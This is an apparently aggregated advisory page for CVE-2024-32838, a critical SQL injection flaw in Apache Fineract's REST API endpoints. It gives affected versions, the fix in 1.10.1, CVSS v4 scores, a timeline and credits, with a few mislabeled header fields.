SQL Injection Vulnerability in Apache Fineract by Apache
CVE-2024-32838

9.4CRITICAL

Key Information:

Vendor: Apache
Status: Apache Fineract
Vendor: CVE Published:; 12 February 2025

What is CVE-2024-32838?

CVE-2024-32838 is a SQL Injection vulnerability found in the Apache Fineract server, which is used for financial services and provides a robust platform for creating and managing financial products. This security flaw affects Apache Fineract versions 1.9 and earlier, enabling authenticated attackers to inject malicious data through specific API endpoints. If exploited, this vulnerability could compromise sensitive data and functionality, posing significant risks to organizations relying on Fineract for their financial operations.

Technical Details

The vulnerability resides in various REST API endpoints related to offices, dashboards, and other functionalities in Apache Fineract. An attacker with valid credentials can manipulate the query parameters in requests to execute unauthorized SQL commands, potentially leading to data exposure or corruption. The vulnerability has been addressed in version 1.10.1, which implements a SQL Validator for enhanced protection against such attacks.

Potential impact of CVE-2024-32838

Data Breaches: Exploitation of this vulnerability can lead to unauthorized access to sensitive financial data, potentially compromising customer information and organizational integrity.
System Compromise: By injecting malicious SQL queries, attackers can manipulate the database, leading to unexpected behaviors, data loss, or even complete system control.
Operational Disruption: The presence of this vulnerability may result in decreased system reliability and availability, impacting business continuity and service delivery for organizations that depend on Apache Fineract for their financial transactions.

Affected Version(s)

Apache Fineract 1.4 <= 1.9

References

https://lists.apache.org/thread/7l88h17pn9nf8zpx5bbojk7ko...

vendor-advisory

CVSS V4

Score:

9.4

Severity:

CRITICAL

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

None

Privileges Required:

Undefined

User Interaction:

None

Timeline

Vulnerability published
Feb 12, 2025
Vulnerability Reserved
Apr 18, 2024

Credit

Kabilan S - Security engineer at Zoho

Aleksandar Vidakovic